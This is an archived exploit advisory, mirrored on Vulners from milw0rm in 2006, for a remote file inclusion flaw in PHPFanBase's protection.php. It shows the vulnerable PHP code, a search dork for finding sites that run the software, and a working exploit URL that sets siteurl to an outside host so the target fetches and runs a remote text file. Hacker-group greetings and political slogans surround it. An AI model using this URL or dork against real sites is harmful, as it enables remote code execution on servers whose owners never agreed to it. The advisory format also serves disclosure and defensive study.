Vulners
Lucene search
PHPFanBase 2.x - 'protection.php' Remote File Inclusion
--------------------------------------|| Viva Palestine ||-----------------------------------------
--------------------------------------|| Free Saddam Hussien ||-----------------------------------------
PHPFanBase (protection.php) Remote File Include Vulnerability
Found By : CoLd Zero [ Wasem898 ]
Source : www.4azhar.com
SpECiALPowEr.oRg
A_mal Team
PalesTine Arab Muslim Hacker
http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif
######################################################
#
# PHPFanBase ]All[
#
# Class: Remote File Include Vulnerability
# Published 2006-12-19
# Remote: Yes
# Type: Dangerous
# Site: http://codegrrl.com/!/scripts/
#
# Author: Cold Zero
# Contact: [email protected]
#
# Dork: Powered By PHPFanBase
######################################################
File :
/protection.php
===========================
<?
$user_passwords = array (
"$admin_username" => "$admin_password" );
// This is the page to show when the user has been logged out
$logout_page = "$siteurl";
// Page with login form
$login_page = "login.php";
// Page to show if the user enters an invalid login name or password
$invalidlogin_page = "invalidlogin.php";
//DON'T EDIT ANYTHING BELOW THIS!!!
if ($action == "logout")
{
Setcookie("logincookie[pwd]","",time() -86400);
Setcookie("logincookie[user]","",time() - 86400);
include($logout_page);
exit;
}
else if ($action == "login")
{
if (($loginname == "") || ($password == ""))
{
include($invalidlogin_page);
exit;
}
else if (strcmp($user_passwords[$loginname],$password) == 0)
{
Setcookie("logincookie[pwd]",$password,time() + 86400);
Setcookie("logincookie[user]",$loginname,time() + 86400);
}
else
{
include($invalidlogin_page);
exit;
}
}
else
{
if (($logincookie[pwd] == "") || ($logincookie[user] == ""))
{
include($login_page);
exit;
}
else if
(strcmp($user_passwords[$logincookie[user]],$logincookie[pwd]) =
= 0)
{
Setcookie("logincookie[pwd]",$logincookie[pwd],time() +
86400);
Setcookie("logincookie[user]",$logincookie[user],time() +
86400)
;
}
else
{
include($invalidlogin_page);
exit;
}
}
===========================
Exploit :
Http://www.Victem.0/[PaTH]/protection.php?action=logout&siteurl=http://4azhar.com/soft.txt?
======================================================
---- GreeTz: [MoHaNdKo] [Cold One] [Cold ThreE] [Viper Hacker] [The Wolf KSA] [o0xxdark0o[ [OrGanza] [H@mLiT] [Snake12][Root Shell]
[Metoovit] [Fucker_net] [Rageb][CoDeR] [HuGe][Str0ke] [Dr.TaiGaR[ [JEeN HacKer] [Nazy L!unx[ Everyone I know
****************************************************************
# *www.4azhar.com Securty Team >> www.4azhar.com *
# *SpeciaL PoweR SecuritY Team >> www.specialpower.org *
# *A_mal Hacking Team >> -vv -l -p The-Pradise *
*****************************************************************
http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif
--------------------------------------|| Viva Palestine ||-----------------------------------------
--------------------------------------|| Free Saddam Hussien ||-----------------------------------------
# milw0rm.com [2006-12-19]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Dec 2006 00:00Current
7.4High risk
Vulners AI Score7.4